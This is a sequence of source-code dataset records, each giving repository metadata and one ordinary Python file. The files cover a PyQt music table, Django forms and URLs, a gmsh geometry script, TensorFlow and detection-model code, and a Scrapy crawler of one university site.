6ce2efa1815bfbcb8520ef0ef62c4d9a19a81325 | 46e9fc0fc20a58026d35a163c7201f1b40844ce8 | /src/widgets/music_table_widget.py | cc86686d7da19ee6e19240dc84ed25d9aaa756ad | [
"MIT"
] | permissive | kiragoo/FeelUOwn | c47d09bd8f1ee6200ebd5c8a0de30e5b6f403d22 | 07b88b452af873f1596a1cbf551a21ffc940cb94 | refs/heads/master | 2021-05-29T23:25:51.556985 | 2015-08-05T09:14:33 | 2015-08-05T09:14:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,877 | py | # -*- coding:utf8 -*-
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from base.logger import LOG
class MusicTableWidget(QTableWidget):
"""显示音乐信息的tablewidget
"""
signal_play_music = pyqtSignal([int], name='play_music')
signal_remove_music_from_list = pyqtSignal([int], name='remove_music_from_list')
def __init__(self, rows=0, columns=5, parent=None):
super().__init__(rows, columns, parent)
self.__row_mid_map = [] # row 为 index, mid为值
self.__special_focus_out = False
self.__signal_mapper = QSignalMapper() # 把remove_music按钮和mid关联起来
self.__set_prop()
self.__init_signal_binding()
def __set_objects_name(self):
pass
def __init_signal_binding(self):
self.cellDoubleClicked.connect(self.on_cell_double_clicked)
self.cellClicked.connect(self.on_remove_music_btn_clicked)
def __set_prop(self):
self.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.horizontalHeader().setDefaultAlignment(Qt.AlignLeft)
self.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setHorizontalHeaderLabels([u'歌曲名',
u'歌手',
u'专辑名',
u'时长'])
self.setShowGrid(False) # item 之间的 border
self.setMouseTracking(True)
self.setFocusPolicy(Qt.StrongFocus)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setAlternatingRowColors(True)
def focusOutEvent(self, event):
self.close()
def add_item_from_model(self, music_model):
if self.is_item_already_in(music_model['id']) is not False: # is
return False
artist_name = ''
music_item = QTableWidgetItem(music_model['name'])
album_item = QTableWidgetItem(music_model['album']['name'])
if len(music_model['artists']) > 0:
artist_name = music_model['artists'][0]['name']
artist_item = QTableWidgetItem(artist_name)
duration = music_model['duration']
m = int(duration / 60000)
s = int((duration % 60000) / 1000)
duration = str(m) + ':' + str(s)
duration_item = QTableWidgetItem(duration)
music_item.setData(Qt.UserRole, music_model)
row = self.rowCount()
self.setRowCount(row + 1)
self.setItem(row, 0, music_item)
self.setItem(row, 1, artist_item)
self.setItem(row, 2, album_item)
self.setItem(row, 3, duration_item)
btn = QLabel()
btn.setToolTip(u'从当前播放列表中移除')
btn.setObjectName('remove_music') # 为了应用QSS,不知道这种实现好不好
self.setCellWidget(row, 4, btn)
# btn.clicked.connect(self.__signal_mapper.map)
# self.__signal_mapper.setMapping(btn, music_model['id'])
# self.__signal_mapper.mapped.connect(self.on_remove_music_btn_clicked)
self.setRowHeight(row, 30)
self.setColumnWidth(4, 30)
row_mid = dict()
row_mid['mid'] = music_model['id']
row_mid['row'] = row
return True
def set_songs(self, tracks):
self.setRowCount(0)
for track in tracks:
self.add_item_from_model(track)
def is_item_already_in(self, mid):
row = self.find_row_by_mid(mid)
if row is not None:
return row
return False
def focus_cell_by_mid(self, mid):
row = self.find_row_by_mid(mid)
self.setCurrentCell(row, 0)
self.setCurrentItem(self.item(row, 0))
self.scrollToItem(self.item(row, 0))
def find_row_by_mid(self, mid):
row = False
total = self.rowCount()
i = 0
while i < total:
item = self.item(i, 0)
data = item.data(Qt.UserRole)
tmp_mid = data['id']
if tmp_mid == mid:
row = i
break
i += 1
return row
def find_mid_by_row(self, row):
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['mid']
return mid
@pyqtSlot(int, int)
def on_cell_double_clicked(self, row, column):
item = self.item(row, 0)
music_model = item.data(Qt.UserRole)
self.signal_play_music.emit(music_model['id'])
@pyqtSlot(int, int)
def on_remove_music_btn_clicked(self, row, column):
if column != 4:
return
item = self.item(row, 0)
data = item.data(Qt.UserRole)
mid = data['id']
row = self.find_row_by_mid(mid)
self.removeRow(row)
self.signal_remove_music_from_list.emit(mid) | [
"yinshaowen241@gmail.com"
] | yinshaowen241@gmail.com |
8784fdd39fd7940c5323ecb33a5d20bc0be6b2c1 | 4160b450b052830e17457a0412e29414f67caea5 | /goods/apps.py | 42618868a73474215ce8f280268254282c223de0 | [] | no_license | mnogoruk/fastcustoms | 6ad7b058607ddf4d2b56a09e23e66fcfb43be1a7 | 4c3bf7f9f1d4af2851f957a084b6adc2b7b7f681 | refs/heads/master | 2023-08-23T15:54:08.415613 | 2021-10-31T12:21:29 | 2021-10-31T12:21:29 | 372,066,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.apps import AppConfig
class CargoConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'goods'
| [
"lionless072@gmail.com"
] | lionless072@gmail.com |
2e18bb631907b32d1f4cdde82bdb2a57e871174f | 746a9c1f65674cd5bcdce6dbd1971b6a16345f9d | /images/forms.py | dd89b8853a27fc1fdb599041349f517c15c147a7 | [] | no_license | mazulo/bookmarks | 4dc25dc09772663c65698d3cc9f5b653fd409ba9 | 5c2ce3c3ad811466c63f7b0f3a21bf33a6a28f5e | refs/heads/master | 2021-01-10T07:23:37.185414 | 2016-03-23T06:40:53 | 2016-03-23T05:40:53 | 54,158,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | from urllib import request
from django import forms
from django.core.files.base import ContentFile
from django.utils.text import slugify
from .models import Image
class ImageCreateForm(forms.ModelForm):
class Meta:
model = Image
fields = ('title', 'url', 'description')
widgets = {
'url': forms.HiddenInput,
}
def clean_url(self):
url = self.cleaned_data['url']
valid_extensions = ['jpg', 'jpeg']
extension = url.rsplit('.', 1)[1].lower()
if extension not in valid_extensions:
raise forms.ValidationError(
'The given URL does not match valid image extensions.'
)
return url
def save(self, force_insert=False, force_update=False, commit=True):
image = super(ImageCreateForm, self).save(commit=False)
image_url = self.cleaned_data['url']
image_name = '{}.{}'.format(
slugify(image.title),
image_url.rsplit('.', 1)[1].lower()
)
# download image from the given URL
response = request.urlopen(image_url)
image.image.save(
image_name,
ContentFile(response.read()),
save=False
)
if commit:
image.save()
return image
| [
"pmazulo@gmail.com"
] | pmazulo@gmail.com |
846a5e2ab2a378670c30bbbbae0fcf1e5f6f4070 | 23fddc940a266c2d1d0e0b1687c36cdbcc9d54d9 | /test/unittest/line_up/line_up_test.py | adc7a590bbb62f34cfffe5488ea14b34016d80ec | [] | no_license | Cuick/traversing | 210fcfb1c780037de59343fffeb4fa4d3f2eae32 | c78982580af7f63c8bff4dcb37005b7f7c682b5b | refs/heads/master | 2021-01-10T17:38:37.899460 | 2016-11-18T06:06:55 | 2016-11-18T06:06:55 | 55,397,540 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | # -*- coding:utf-8 -*-
"""
created by server on 14-7-14下午6:12.
"""
from test.unittest.base.base_test_case import BaseTestCase
import unittest
class LineUpTest(BaseTestCase):
"""test heros_component and hero"""
def test_add_hero(self):
line_up_component = self.player.line_up_component
line_up_component.change_hero(2, 10001, 1)
def test_hero_link(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
hero_slot = line_up_slot.hero_slot
self.NotEqual(hero_slot.link_skill_ids, [])
def test_set_equip(self):
line_up_slot = self.player.line_up_component.line_up_slots.get(2)
self.NotEqual(line_up_slot.set_equ_skill_ids, [])
if __name__ == '__main__':
unittest.main()
| [
"zxzxck@163.com"
] | zxzxck@163.com |
8b92a7c9c58837640882ba3dee0dcaebc67d62bf | 2383bf5a3b58e468d65713c361718795d51f1b97 | /python/call_test.py | 99c1f81aec4011b55d157f082bfafc64cf379f12 | [
"MIT"
] | permissive | rec/test | 3f4fb6614729ebc72d130888a8a9bc550f92988c | a260b9bf7fea96867e64163d3c891c2e2091f636 | refs/heads/master | 2023-08-03T13:49:24.347294 | 2023-07-28T09:19:39 | 2023-07-28T09:19:39 | 65,399,133 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | class Call1(object):
def __call__(self, x):
return x
class Call2(object):
def __init__(self):
self.call = lambda x: x
def __call__(self, x):
return self.call(x)
class Call3(object):
def __init__(self):
self.__call__ = lambda x: x
print(Call1()(3))
print(Call2()(3))
print(Call3()(3))
| [
"tom@swirly.com"
] | tom@swirly.com |
55048821cc9cb29b98bdf0c56f5b9d6d22ccaed8 | 0a9949a7dbe5f7d70028b22779b3821c62eb6510 | /static/statistic_struct/user portrait_0430/dynamic_analysis/code_test.py | f774cc12c9f529669c7813a4082b3099290f2e91 | [] | no_license | 744996162/warehouse | ed34f251addb9438a783945b6eed5eabe18ef5a2 | 3efd299a59a0703a1a092c58a6f7dc2564b92e4d | refs/heads/master | 2020-06-04T22:10:14.727156 | 2015-07-03T09:40:09 | 2015-07-03T09:40:09 | 35,603,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 162 | py | #ecoding=utf-8
__author__ = 'Administrator'
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
str = '\xe5\x88\xb0\xe8\xbe\xbe'
print(str.encode("utf-8")) | [
"744996162@qq.com"
] | 744996162@qq.com |
d1c9d99e2b1639d463275d911bda31fdb8d8aea9 | ce8ffe238c510f8a80b42aa897ab0ce29698445d | /finfet_ex/finfet/moscap3d.py | 5ccc6333cfd4fa29bd590093e3f9a7177e40537e | [] | no_license | devsim/devsim_misc | 4d29d58314f29cb08939c3580fee24f441f55b50 | 9a3c7056e0e3e7fc49e17031a706573350292d4d | refs/heads/main | 2022-07-20T21:08:08.780498 | 2022-06-27T02:22:11 | 2022-06-27T02:22:11 | 191,487,676 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,331 | py |
import pygmsh
import bool_common
geom = pygmsh.opencascade.Geometry(
#characteristic_length_min=.1,
#characteristic_length_max=2.5e-5
)
w=1
h=1
tox=3
tsi=60
xrf=-0.1
trf=3
l_contact=1
#tcl0=0.5 #cl in ox
#tcl1=0.05 #cl near interface
#tcl2=0.5
#tcl3=0.5 #cl near backside
lcar=0.3
lrf=0.1
gate=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=-tox-l_contact, z=0, lcar=lcar)
ox=bool_common.create_box_volume(geom, h=h, w=w, l=tox, x=-tox, z=0, lcar=lcar)
#rf=bool_common.create_box_volume(geom, h=h, w=w, l=trf, x=0, z=0, lcar=lcar)
si=bool_common.create_box_volume(geom, h=h, w=w, l=tsi, x=0, z=0, lcar=lcar)
sub=bool_common.create_box_volume(geom, h=h, w=w, l=l_contact, x=tsi, z=0, lcar=lcar)
all_volumes=[ox, si, gate, sub]
geom.boolean_fragments( all_volumes,[], delete_first=True, delete_other=False)
#['gate', 'sub', 'interface']
#['oxide', 'silicon']
geom.add_physical_volume(gate, 'gate')
geom.add_physical_volume(sub, 'sub')
geom.add_physical_volume(ox, 'ox')
geom.add_physical_volume(si, 'si')
# TODO: add refinement box
#
mydict = {
"lrf" : lrf,
"lcar" : lcar,
"trf" : trf,
"xrf" : xrf,
"w" : w,
"h" : h,
}
with open('moscap3d.geo', 'w') as ofh:
ofh.write('''\
// This option may be important for background mesh
//Mesh.CharacteristicLengthExtendFromBoundary=0; /* do not extend from boundary points */
//Mesh.Algorithm3D=1 /* 1 is Delaunay, Tetgen */
//Mesh.CharacteristicLengthMax = 1; /*maximum characteristic length */
//Mesh.CharacteristicLengthMin = 0; /*maximum characteristic length */
//Mesh.CharacteristicLengthFromCurvature = 1
//Mesh.CharacteristicLengthFromPoints = 1
//Mesh.CharacteristicLengthExtendFromBoundary=0;
//Geometry.ScalingFactor=1.0e-7;
//Mesh.CharacteristicLengthMax = 2.5e-5; /*maximum characteristic length */
''')
ofh.write(geom.get_code())
ofh.write("\n")
ofh.write('''
Field[1] = Box;
Field[1].VIn = %(lrf)s;
Field[1].VOut = %(lcar)s;
Field[1].XMin = %(xrf)s;
Field[1].XMax = %(trf)s+%(xrf)s;
Field[1].YMin = -0.5*%(h)s;
Field[1].YMax = +0.5*%(h)s;
Field[1].ZMin = 0;
Field[1].ZMax = %(w)s;
Background Field = 1;
Mesh.CharacteristicLengthExtendFromBoundary = 1;
Mesh.CharacteristicLengthFromPoints = 1;
Mesh.CharacteristicLengthMax = %(lcar)s; /*maximum characteristic length */
''' % mydict)
# ofh.write("Coherence;\n")
| [
"juan@tcad.com"
] | juan@tcad.com |
600cb4a4a0fb0c02fd641c0744d20d4413860cd0 | 8d2abf7ad4c3f35801f6bfdb38a4d6cddf1e0fbd | /0404/demo03.py | b105dd59dfb4f75a1769f41c31d1d8eb5067af08 | [] | no_license | erroren/Python_A | e9dfba73fc09160e4d3b8ea994183e2735f9d36e | 47901316902705e513ea7d6e016f98f1cd2d3e85 | refs/heads/master | 2020-05-04T14:27:29.118843 | 2019-06-13T08:50:03 | 2019-06-13T08:50:03 | 179,197,541 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | L = [x for x in range(10)]
print(L, type(L), L.__sizeof__())
L1 = (x for x in range(10))
print(L1, type(L1), L1.__sizeof__())
# print(L1.__next__())
def run(L1):
for i in L1:
yield i
r = run(L1)
while True:
try:
print(next(r))
except Exception as e:
print(e)
break
| [
"hcy@qq.com"
] | hcy@qq.com |
7580457f1767cfc3fd8424fd738c1d6e49fa6094 | c0f5d309576f791f8cc062e2d0cad340eec41d7d | /190326_electric_bus_2.py | 0045a43b557135b855703e93b6422e9e110f0f7f | [] | no_license | mjjin1214/algorithm | fa91455ab792c38d01fd210c12e53e50f516eb55 | 423119406061443939b4b966c7d9f1513544dd03 | refs/heads/master | 2020-04-22T19:31:23.981387 | 2019-04-05T07:58:10 | 2019-04-05T07:58:10 | 170,610,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import sys
sys.stdin = open('input1.txt')
def backtrack(x, count):
global min_count
if count >= min_count:
return
if x >= data[0]:
if min_count > count:
min_count = count
return
for i in range(data[x], 0, -1):
backtrack(x+i, count+1)
T = int(input())
for t in range(T):
data = list(map(int, input().split()))
min_count = data[0]
backtrack(1, 0)
print('#{} {}'.format(t+1, min_count-1)) | [
"moc0etan@gmail.com"
] | moc0etan@gmail.com |
f7a398e1bd474d711dd6004b39549a4426d9920a | 388556baa0c2ee53d8767ae8a4bce18c03124488 | /Chapter10/0011_rev09_match_z.py | b30aaea61405322ecf5e6f08f6aa090553e2a735 | [] | no_license | 8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions | 6e2e7c8cf8babc3c63f75d8d5e987f4dbc018269 | f21d70ae2062cc2d5d3a2fefce81a2a3b4ea3bfd | refs/heads/master | 2022-12-10T04:24:56.364629 | 2020-07-01T11:34:01 | 2020-07-01T11:34:01 | 294,878,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | """
Review Question 9
Matches a word containing "z"
"""
import re
def main():
user_string = input("Enter sequence ")
pattern = re.compile(r"\b\w*z\w*\b")
match_object = pattern.search(user_string)
if match_object:
print("Match found")
print(match_object.group())
else:
print("No match found")
if __name__ == "__main__":
main()
| [
"warren.jitsing@gmail.com"
] | warren.jitsing@gmail.com |
37ad454a8a7d3c8cc63dd66a836de528d210b27f | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03240/s819025179.py | 868e91e9b7562f6eedc217a4bfc2a8b1b491522a | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,979 | py | import sys
import os
import math
import bisect
import itertools
import collections
import heapq
import queue
import array
# 時々使う
# from scipy.sparse.csgraph import csgraph_from_dense, floyd_warshall
# from decimal import Decimal
# from collections import defaultdict, deque
# 再帰の制限設定
sys.setrecursionlimit(10000000)
def ii(): return int(sys.stdin.buffer.readline().rstrip())
def il(): return list(map(int, sys.stdin.buffer.readline().split()))
def fl(): return list(map(float, sys.stdin.buffer.readline().split()))
def iln(n): return [int(sys.stdin.buffer.readline().rstrip())
for _ in range(n)]
def iss(): return sys.stdin.buffer.readline().decode().rstrip()
def sl(): return list(map(str, sys.stdin.buffer.readline().decode().split()))
def isn(n): return [sys.stdin.buffer.readline().decode().rstrip()
for _ in range(n)]
def lcm(x, y): return (x * y) // math.gcd(x, y)
# MOD = 10 ** 9 + 7
MOD = 998244353
INF = float('inf')
def main():
if os.getenv("LOCAL"):
sys.stdin = open("input.txt", "r")
N = ii()
xyh = [il() for _ in range(N)]
for cx in range(0, 101):
for cy in range(0, 101):
tmp_x, tmp_y, tmp_h = -1, -1, -1
for x, y, h in xyh:
# 高さが1以上の調査点から
# ピラミッドの中心を求める
if h == 0:
continue
tmp_x, tmp_y = cx, cy
tmp_h = h + abs(x - cx) + abs(y - cy)
break
if tmp_h != -1:
# 求めた中心が全ての調査点の条件と
# 一致するか否かを確かめる
for x, y, h in xyh:
if h != max(tmp_h - abs(x - tmp_x) - abs(y - tmp_y), 0):
break
else:
print(tmp_x, tmp_y, tmp_h)
exit()
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
83bd218a3a6158cde57369b86689442952cd1249 | f8ad6963bfc851657ea50c6a036cfad29cdd7f60 | /Books/LearningTensorFlow/Chapter3_Tensorflow_Basic_Understand/subchapter_03_04_Linear_Regression.py | 9c139d920a30a7310ed8b501626cfe7d1ea747e6 | [] | no_license | foru120/PythonRepository | e1ab0265c0f50ef2e9acdf7447237c913560692b | db6b6be0f9fb91b0a81a3b6a2ec5631daab10f98 | refs/heads/master | 2021-01-01T06:53:11.728109 | 2019-04-25T13:52:50 | 2019-04-25T13:52:50 | 97,541,222 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,265 | py | import numpy as np
import tensorflow as tf
x_data = np.random.randn(2000, 3)
w_real = [0.3, 0.5, 0.1]
b_real = -0.2
noise = np.random.randn(1, 2000) * 0.1
y_data = np.matmul(w_real, x_data.T) + b_real + noise
NUM_STEPS = 10
g = tf.Graph()
wb_ = []
with g.as_default():
x = tf.placeholder(dtype=tf.float32, shape=[None, 3])
y_true = tf.placeholder(dtype=tf.float32, shape=None)
with tf.name_scope('inference') as scope:
w = tf.Variable([[0, 0, 0]], dtype=tf.float32, name='weights')
b = tf.Variable(0, dtype=tf.float32, name='bias')
y_pred = tf.matmul(w, tf.transpose(x)) + b
with tf.name_scope('loss') as scope:
loss = tf.reduce_mean(tf.square(y_true - y_pred))
with tf.name_scope('train') as scope:
learning_rate = 0.5
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
train = optimizer.minimize(loss)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for step in range(NUM_STEPS):
sess.run(train, {x: x_data, y_true: y_data})
if step % 5 == 0:
print(step, sess.run([w, b]))
wb_.append(sess.run([w, b]))
print(10, sess.run([w, b])) | [
"broodsky1122@hanmail.net"
] | broodsky1122@hanmail.net |
53a3368b892b1ea07bd5aed868eef146253be066 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/others/CenterMask2/models/centermask2/centermask/modeling/centermask/maskiou_head.py | 23823fce2c12478ba7bdb4b83597a3363504cb80 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,952 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright (c) Sangrok Lee and Youngwan Lee (ETRI) All Rights Reserved.
import torch
from torch import nn
from torch.nn import functional as F
from detectron2.layers import Conv2d, ShapeSpec, cat
from detectron2.utils.registry import Registry
from centermask.layers import MaxPool2d, Linear
ROI_MASKIOU_HEAD_REGISTRY = Registry("ROI_MASKIOU_HEAD")
ROI_MASKIOU_HEAD_REGISTRY.__doc__ = """
Registry for maskiou heads, which predicts predicted mask iou.
The registered object will be called with `obj(cfg, input_shape)`.
"""
def mask_iou_loss(labels, pred_maskiou, gt_maskiou, loss_weight, weight):
"""
Compute the maskiou loss.
Args:
labels (Tensor): Given mask labels (num of instance,)
pred_maskiou (Tensor): A tensor of shape (num of instance, C)
gt_maskiou (Tensor): Ground Truth IOU generated in mask head (num of instance,)
"""
def l2_loss(input, target):
"""
very similar to the smooth_l1_loss from pytorch, but with
the extra beta parameter
"""
pos_inds = target > 0.0
if pos_inds.sum() > 0:
cond = torch.abs(input - target)
loss = 0.5 * cond**2 / pos_inds.sum()
else:
loss = input * 0.0
return (loss*weight.float()*pos_inds.float()).sum()
if labels.numel() == 0:
return pred_maskiou.sum() * 0
index = torch.arange(pred_maskiou.shape[0]).to(device=pred_maskiou.device)
maskiou_loss = l2_loss(pred_maskiou[index, labels], gt_maskiou)
maskiou_loss = loss_weight * maskiou_loss
return maskiou_loss
def mask_iou_inference(pred_instances, pred_maskiou):
labels = cat([i.pred_classes for i in pred_instances])
num_masks = pred_maskiou.shape[0]
index = torch.arange(num_masks, device=labels.device).long()
num_boxes_per_image = [len(i) for i in pred_instances]
maskious = pred_maskiou[index, labels].split(num_boxes_per_image, dim=0)
for maskiou, box in zip(maskious, pred_instances):
box.mask_scores = box.scores * maskiou
@ROI_MASKIOU_HEAD_REGISTRY.register()
class MaskIoUHead(nn.Module):
def __init__(self, cfg, input_shape: ShapeSpec):
super(MaskIoUHead, self).__init__()
# fmt: off
num_classes = cfg.MODEL.ROI_HEADS.NUM_CLASSES
conv_dims = cfg.MODEL.ROI_MASKIOU_HEAD.CONV_DIM
num_conv = cfg.MODEL.ROI_MASKIOU_HEAD.NUM_CONV
input_channels = input_shape.channels + 1
resolution = input_shape.width // 2
# fmt: on
self.conv_relus = []
stride = 1
for k in range(num_conv):
if (k+1) == num_conv:
stride = 2
conv = Conv2d(
input_channels if k == 0 else conv_dims,
conv_dims,
kernel_size=3,
stride=stride,
padding=1,
activation=F.relu
)
self.add_module("maskiou_fcn{}".format(k+1), conv)
self.conv_relus.append(conv)
self.maskiou_fc1 = Linear(conv_dims*resolution**2, 1024)
self.maskiou_fc2 = Linear(1024, 1024)
self.maskiou = Linear(1024, num_classes)
self.pooling = MaxPool2d(kernel_size=2, stride=2)
for l in self.conv_relus:
nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
nn.init.constant_(l.bias, 0)
for l in [self.maskiou_fc1, self.maskiou_fc2]:
nn.init.kaiming_normal_(l.weight, mode="fan_out", nonlinearity="relu")
nn.init.constant_(l.bias, 0)
nn.init.normal_(self.maskiou.weight, mean=0, std=0.01)
nn.init.constant_(self.maskiou.bias, 0)
def forward(self, x, mask):
mask_pool = self.pooling(mask)
x = torch.cat((x, mask_pool), 1)
for layer in self.conv_relus:
x = layer(x)
x = torch.flatten(x, 1)
x = F.relu(self.maskiou_fc1(x))
x = F.relu(self.maskiou_fc2(x))
x = self.maskiou(x)
return x
def build_maskiou_head(cfg, input_shape):
"""
Build a mask iou head defined by `cfg.MODEL.ROI_MASKIOU_HEAD.NAME`.
"""
name = cfg.MODEL.ROI_MASKIOU_HEAD.NAME
return ROI_MASKIOU_HEAD_REGISTRY.get(name)(cfg, input_shape)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
539f747aea7fe6c503a164283f17c23d2cc410ef | 7e9c3b7684a7c9d712382cb170ab2ca1485b5ea2 | /test/test_monty.py | ed1e6c94242cb103125420c1f68e9ec9b17fbb0c | [
"Apache-2.0"
] | permissive | hackerlist/monty-python | 0adabb857d6025b8004f406a10f59a533c3df464 | eb4233e2f0301665e3469401e71d8a54c4503311 | refs/heads/master | 2020-12-30T09:38:07.050584 | 2014-05-24T10:45:23 | 2014-05-24T10:45:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | #-*- coding: utf-8 -*-
"""
montypy.test
~~~~~~~~~~~~
Test cases for monty-python
"""
import unittest
import os
from montypy import Monty
TEST_SRV = 'https://monty.criticalpha.se'
class TestMontyPy(unittest.TestCase):
def test_instantiation(self):
m = Monty(TEST_SRV)
def test_nodes(self):
m = Monty(TEST_SRV)
nodes = m.nodes()
def test_probes(self):
m = Monty(TEST_SRV)
probes = m.probes()
def test_scripts(self):
m = Monty(TEST_SRV)
scripts = m.scripts()
def test_results(self):
m = Monty(TEST_SRV)
results = m.results()
def test_status(self):
m = Monty(TEST_SRV)
statuses = m.status()
| [
"michael.karpeles@gmail.com"
] | michael.karpeles@gmail.com |
74c58f92a24f50e470b93242b98a5a0b06c6581c | 69f2b8f54d923a064bf0de20249b5aa619f1da12 | /example/example/common/urls.py | 6c7ab2725da62af487d78fe557a29dc7035f43b8 | [] | no_license | skibblenybbles/django-dojoforms | 8302dff51f571d35e2c1f8439487baf494cd655c | 75e7b7a1c05c7db64df56352bd9e697450da4dab | refs/heads/master | 2020-12-29T01:41:46.657653 | 2012-11-08T03:55:50 | 2012-11-08T03:55:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.conf.urls import patterns, include, url
urlpatterns = patterns("example.common.views",
url(r'^$', "pages.homepage_view", name="homepage"),
)
| [
"mkibbel@gmail.com"
] | mkibbel@gmail.com |
24f50ff549e8c93fb62458eeb8bef3690e2293e6 | 63707652ba98b136744efd61115b7da9decd64ea | /homework1/q3/q3/spiders/q3_spider.py | d299ef2b3f7cf3267c544659ea1f1b26beb153c8 | [] | no_license | yerihyo/cs6200f13 | ad79a576f8ad190ef9f35049df988e62310ed0db | 96c5161a1b767118ded5dee441140fe49c499251 | refs/heads/master | 2021-01-01T18:07:55.390969 | 2013-09-18T22:57:27 | 2013-09-18T22:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,559 | py | from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from q3.items import HyperlinkItem
import re
import urlparse
import sys
from scrapy.exceptions import CloseSpider
# from scrapy.contrib.closespider import CloseSpider
class MyExtractor(SgmlLinkExtractor):
seen_urls = {}
def __init__(self, allow=(), deny=(), allow_domains=(), deny_domains=(), restrict_xpaths=(),
tags=('a', 'area'), attrs=('href'), canonicalize=True, unique=True, process_value=None,
deny_extensions=None, seen_urls=[]):
SgmlLinkExtractor.__init__(self,allow=allow, deny=deny, allow_domains=allow_domains, deny_domains=deny_domains, restrict_xpaths=restrict_xpaths,
tags=tags, attrs=attrs, canonicalize=canonicalize, unique=unique, process_value=process_value,
deny_extensions=deny_extensions)
for l in seen_urls: self.seen_urls[l]=True
def is_valid_link(self,l):
url = l.url
p = urlparse.urlparse(url)
if p.scheme != 'http': return False
if p.netloc != 'www.ccs.neu.edu': return False
# if p.netloc != 'www.northeastern.edu': return False
if url in self.seen_urls: return False
self.seen_urls[url] = True
return True
def extract_links(self, response):
links = SgmlLinkExtractor.extract_links(self, response) # python's old-style super
filtered_links = filter(self.is_valid_link, links)
return filtered_links
class CCSSpider(CrawlSpider):
    """Crawl www.ccs.neu.edu and yield HyperlinkItems for HTML/PDF pages.

    The crawl is aborted via CloseSpider after just over 100 items.
    """

    name = "ccs.neu.edu"
    start_urls = [
        "http://www.ccs.neu.edu/",
        # "file:///tmp/tt",
    ]
    # Shared extractor; its class-level ``seen_urls`` dict is also written to
    # directly from parse() below.
    extractor = MyExtractor(seen_urls=[], tags=('a','area','link'), unique=False, deny_extensions=[])
    # Number of items yielded so far; used as the stop condition.
    count = 0
    rules = (
        Rule(extractor, callback="parse_page", follow=True),
    )

    def parse(self,response):
        # Mark the start page itself as seen, emit its items, then hand off to
        # CrawlSpider's default link-following machinery.
        self.extractor.seen_urls[response.url]=True
        for i in self.parse_page(response):
            yield i
        for r in CrawlSpider.parse(self,response):
            yield r

    def parse_page(self,response):
        # Content-Type may carry parameters ("text/html; charset=..."), so
        # split on ';' before matching.
        content_types = re.split('\s*;\s*',response.headers['Content-Type'])
        url = response.url
        # Only HTML pages and PDFs are recorded.
        if 'application/pdf' in content_types or 'text/html' in content_types:
            yield HyperlinkItem(url=url)
            self.count += 1
            if self.count>100:
                raise CloseSpider("Closing spider")
| [
"yerihyo@gmail.com"
] | yerihyo@gmail.com |
537b65a9a936c8cc8663d161026ab155e899d103 | e3dcfa127f8d1e03b25d9f38d1d93bea9926d3b5 | /weaver/devtools/devclean.py | 183a4076e3b3ab0df35d7611d31c1229f4ca3c85 | [
"MIT"
